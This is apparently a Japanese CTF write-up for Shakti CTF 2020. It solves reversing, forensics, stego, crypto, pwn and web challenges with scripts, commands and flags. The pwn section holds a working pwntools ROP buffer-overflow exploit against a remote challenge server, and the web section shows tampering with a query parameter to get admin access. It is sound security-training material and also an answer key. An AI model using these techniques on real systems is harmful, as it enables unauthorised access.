Shakti CTF 2020 忘備録

Reversing

Just-Run-It!

Do you know how to run a binary in linux?

実行するだけ

~/ctf/Shakti CTF ᐅ ./run 
Here's your flag! : shaktictf{and_that's_how_you_run_a_linux_binary!}
FLAG : shaktictf{and_that's_how_you_run_a_linux_binary!}

PYthn

Familiar with python?
Z=[]
k=[]
Q="K78m)hm=|cwsXhbH}uq5w4sJbPrw6"
def Fun(inp):
    st=[]
    for i in range (len(inp)):
        st.append(chr(ord(inp[i])^1))
    return(''.join(st))
def FuN(inp):
    for i in range(len(inp)):
        if(i<11):
            Z.append(chr(ord(inp[i])+i+5))
        else:
            Z.append(chr(ord(inp[i])+4))      
    return(''.join(Z))
def fuN(text,s): 
    result = "" 
    for i in range(len(text)): 
        char = text[i] 
        if(char.isnumeric()):
            result+=(chr(ord(char)-1))
        elif(char.isupper()): 
            result += chr((ord(char) + s-65) % 26 + 65) 
        else: 
            result+=(chr(ord(char)^1))
    return result 
X=input("Enter input:")
k=FuN(Fun(X))
if(Q!=k):
    print("NO")
else:
    print("Flag: shaktictf{"+X+"}")

solve.py

Z=[]

Q="K78m)hm=|cwsXhbH}uq5w4sJbPrw6"

def Fun(inp):
    st=[]
    for i in range (len(inp)):
        st.append(chr(ord(inp[i])^1))
    return(''.join(st))

def FuN(inp):
    for i in range(len(inp)):
        if(i<11):
            Z.append(chr(ord(inp[i])-i-5))
        else:
            Z.append(chr(ord(inp[i])-4))      
    return(''.join(Z))

print(Fun(FuN(Q)))
~/ctf/Shakti CTF/PYthn ᐅ python3 solve.py
G00d!_c0nTinUe_Expl0r1nG_Mor3
FLAG : shaktictf{G00d!_c0nTinUe_Expl0r1nG_Mor3}

Damez

Oops! There was a sudden crash on Margret's system. She's afraid that she lost the passcode which she needs in urgency for running a simple prog which hopefully was backed up. Could you figure out the passcode and run the program successfully.

IDAで見たらフラグがあった

f:id:Yunolay:20201205100642p:plain

FLAG : shaktictf{K33p_th3_gam3_g0ing_gurl!}

Forensics

Shark on Wire

Lara sent me a file which had some hidden message. Help me recover the secret information.

Wiresharkで見る f:id:Yunolay:20201205100931p:plain

FLAG : shaktictf{wir3sh4rk_i5_ju5t_aw3s0m3}

Not That Easy

We have intercepted the communication between two criminals and we found that they had shared a secret information. Can you find out the secret?

pngがある。rawで保存する。 f:id:Yunolay:20201205155439p:plain

f:id:Yunolay:20201205155505p:plain

FLAG : shaktictf{sh3_w4s_h0n0r3d_by_3lectr0nic_fr0nti3r_f0und4ti0n}

Steganography

Hidd3n

##############################
########## exiftool ##########
##############################
ExifTool Version Number         : 10.40
File Name                       : image.jpg
Directory                       : .
File Size                       : 44 kB
File Modification Date/Time     : 2020:12:04 18:21:00+00:00
File Access Date/Time           : 2020:12:05 05:05:46+00:00
File Inode Change Date/Time     : 2020:12:05 05:05:42+00:00
File Permissions                : rw-------
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : cGFzc3BocmFzZT1qdTV0ZmluZG0z
Image Width                     : 800
Image Height                    : 600
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 800x600
Megapixels                      : 0.480
$ echo cGFzc3BocmFzZT1qdTV0ZmluZG0z | base64 -d
passphrase=ju5tfindm3
root@3a8a801b9951:/data# steghide extract -sf image.jpg 
Enter passphrase: ju5tfindm3
wrote extracted data to "flag.txt".
"In engineering, the point is to get the job done, and people are happy to help. You should be generous with credit, and you should be happy to help others." Who am I?

Here is your flag: shaktictf{G00d!_b3st_0f_luck_f0r_th3_n3xt_chall3nge}
FLAG : shaktictf{G00d!_b3st_0f_luck_f0r_th3_n3xt_chall3nge}

Cryptography

3,2,1..Go

Introducing our theme woman : "Joan Clarke!" Cipher : WEQEXFTUXQHVOUFPSVLPTORHAFBQE

Looks like I found something I shouldn't have. Seperate the words by underscores('_ ') and submit everything in lowercase around the flag format

configを参考にエニグマ暗号を解く

f:id:Yunolay:20201205101139p:plain

FLAG : shaktictf{you_have_cracked_the_enigma_genius}

Easy Encoding

Joan knows this is breakable. Do you know how?

01001110 01111010 01001101 00110010 01001111 01000100 01011001 01111000 01001110 01101101 01001001 00110011 01001110 01000100 01011001 00110101 01001110 01101010 01001101 00110011 01001110 01000100 01011001 00110010 01001110 00110010 01001001 00110001 01001110 01111010 01001101 00110000 01001110 01111010 01001001 00110010 01011010 01000100 01010101 00110001 01001110 01111010 01000001 00110001 01011010 01101010 01010001 01111010 01001110 01101010 01100111 01111010 01001110 01000100 01011010 01101010 01001110 01101101 01001101 01111010 01001101 01111010 01011010 01101100 01001110 01101010 01100011 01111010 01001101 01111010 01100100 01101011

from bin, base64, hexの順でデコードする

f:id:Yunolay:20201205101602p:plain

FLAG  :  shaktictf{W4rmUp_Ch4ll3ng3}

Ancient Warfare

rot13

Do you know how people from Caeser's time used to send encrypted messages?

Try to get the flag : funxgvpgs{byq3e_1f_a0g_nyj4lf_gu3_o3gg3e!}
FLAG : shaktictf{old3r_1s_n0t_alw4ys_th3_b3tt3r!}

SimpleRSA

Here's the secret message from Joan to you. Break it and Read it.
Here's a simple RSA challenge for you. 
n = 6823097956559906304718047559434503772935670794168872682087986860491266565197938988585578012131795379682740793915178580560097648572207445450501957620442660379247761L
e = 65537
c = 484661494807973176484841550022162356056969394230726278907827156279573785417739620605749085238379352332325669223692676583758711843467179784519220209212809010990483
~/tools/RsaCtfTool (master ✘)✭ ᐅ python3 RsaCtfTool.py -n 6823097956559906304718047559434503772935670794168872682087986860491266565197938988585578012131795379682740793915178580560097648572207445450501957620442660379247761 -e 65537 --uncipher 484661494807973176484841550022162356056969394230726278907827156279573785417739620605749085238379352332325669223692676583758711843467179784519220209212809010990483
[+] Clear text : b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00shaktictf{Gr3a7-g01ng-g1rl-Y4yyy!!}'
FLAG : shaktictf{Gr3a7-g01ng-g1rl-Y4yyy!!}

Pwn

Connect

Your adventure begins here to help the renowned Computer Scientist Kathleen Booth to get across the challenges and win the race. Cross the gates and enter into the arena!

繋ぐだけ

~/ctf/Shakti CTF ᐅ nc 34.72.218.129 1111
You have successfully connected to our service!
To get your flag, please enter the appropriate bash commands.
cat flag.txt
shaktictf{w3lc0me_t0_th3_ar3na_c0mrade}
FLAG : shaktictf{w3lc0me_t0_th3_ar3na_c0mrade}

Adventure Chain

Kathleen is on her next adventure, which marked her name in history of Computer Science forever. Looks like the pieces of her ARC code seem to be brewing something notorious. Follow the chains which might lead you to a hideous place where you can claim your mastery and discover the unintended invention.

f:id:Yunolay:20201205102230p:plain

gdb-peda$ patto AA0AAFAAbA
AA0AAFAAbA found at offset: 40

ripのoffsetは40

f:id:Yunolay:20201205102602p:plain

flag関数ではif ( password == 0x1337 && admin_val == 0xCAFEBABE && a1 == 0xDEADC0DE && a2 == 0xDEAD10CC )を満たさなくてはいけない。 assert関数でpasswordを指定する。

__int64 __noreturn assert()
{
  password = 0x1337;
  return 0LL;
}

setValue関数でadmin_valを設定できる。 pop rdi; ret;で0xDEADBEEFを第一引数に指定する。

__int64 __fastcall setValue(int a1)
{
  if ( password != 0x1337 || a1 != 0xDEADBEEF )
    puts("Oops no :(");
  else
    admin_val = 0xCAFEBABE;
  return 0LL;
}

あとはflag関数で第一引数0xDEADC0DE、第二引数0xDEAD10CCを満たすようにROPを組む

from pwn import *

binary = "./chall"
host ="34.72.218.129"
port = 4444

elf = ELF(binary)
context.binary = binary
context.log_level = "info"

commands = """
continue
"""

if len(sys.argv) >= 2 and sys.argv[1] == "r":
    # remote
    s = remote(host, port)
elif len(sys.argv) >= 2 and sys.argv[1] == "d":
    # debug
    s = gdb.debug(binary, commands)
    # libc = elf.libc
else:
    # local
    s = process(binary)
    # libc = elf.libc

pop_rdi = next(elf.search(asm("pop rdi; ret")))
pop_rsi_r15 = next(elf.search(asm("pop rsi ; pop r15 ; ret")))

s.sendlineafter(">> ", "1")

payload = b"A"*40
payload += p64(elf.sym["assert"])
payload += p64(pop_rdi)
payload += p64(0xDEADBEEF)
payload += p64(elf.sym["setValue"])
payload += p64(pop_rdi)
payload += p64(0xDEADC0DE)
payload += p64(pop_rsi_r15)
payload += p64(0xDEAD10CC)
payload += p64(0)
payload += p64(elf.sym["flag"])

s.sendlineafter("Enter your name:\n", payload)

sleep(1)
s.interactive()
~/ctf/Shakti CTF/Adventure Chain ᐅ python3 exploit.py r
[*] '/home/user/ctf/Shakti CTF/Adventure Chain/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 34.72.218.129 on port 4444: Done
[*] Switching to interactive mode
Mischief managed...
Here is your flag:
shaktictf{r0pe_climbing_chaining_1337_way}
[*] Got EOF while reading in interactiv
FLAG : shaktictf{r0pe_climbing_chaining_1337_way}

Web

Biscuits

Ada Lovelace used to love eating french biscuits during her work

クッキーにフラグがある

f:id:Yunolay:20201205103715p:plain

URLデコードする

FLAG : shaktictf{c00k13s_m4k3_phr3n0l0gy&m3sm3r15m_3asy}

Machine

Babbage was impressed by Lovelace's intellect and analytic skills that he called her a humanoid

robots.txtを見る

~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://34.72.245.53/Web/Machine/robots.txt
User-agent: *
Allow: /var/www/html/
Disallow: /mkiujnbhytgbvfr.html

~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://34.72.245.53/Web/Machine/mkiujnbhytgbvfr.html
shaktictf{7h3_3nch4n7r355_0f_Nu3b3r}
FLAG : shaktictf{7h3_3nch4n7r355_0f_Nu3b3r}

Ador

Ada was born on 10 December 1815 not 12, identification change makes a difference

adminならsecretが見れるらしい

f:id:Yunolay:20201205104444p:plain

ソースを確認するとuserパラメータがあるらしい

f:id:Yunolay:20201205104707p:plain

~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://104.198.67.251/Ador/\?name\=admin 
Welcome Admin, here is the secret shaktictf{f1r5t_c0mpu73r_pr0gr4mm3r}
FLAG : shaktictf{f1r5t_c0mpu73r_pr0gr4mm3r}

AuthEN

Ada is important to the world, she is important for a reason

ソースにパスワードがある

<script>
                $(“.c_submit”).click(function(event) {
 event.preventDefault()
 var email = $(“#cuser”).val();
 var password = $(“#cpass”).val();
 if(username == “admin” && password == String.fromCharCode(115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125)) {
 if(document.location.href.indexOf(“?password=”) == -1) { 
 document.location = document.location.href + “?password=” + password;
 }
 } else {
 $(“#cresponse”).html(“<div class=’alert alert-danger’>Wrong password sorry.</div>”);
 }
 })
                </script>

f:id:Yunolay:20201205105249p:plain

s = [115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125]
flag = ""
for c in s:
    flag += chr(c)
print(flag)
~/ctf/Shakti CTF ᐅ python3 solve.py 
shaktictf{b3y0nd_pur3_c4lculati0ns}
FLAG : shaktictf{b3y0nd_pur3_c4lculati0ns}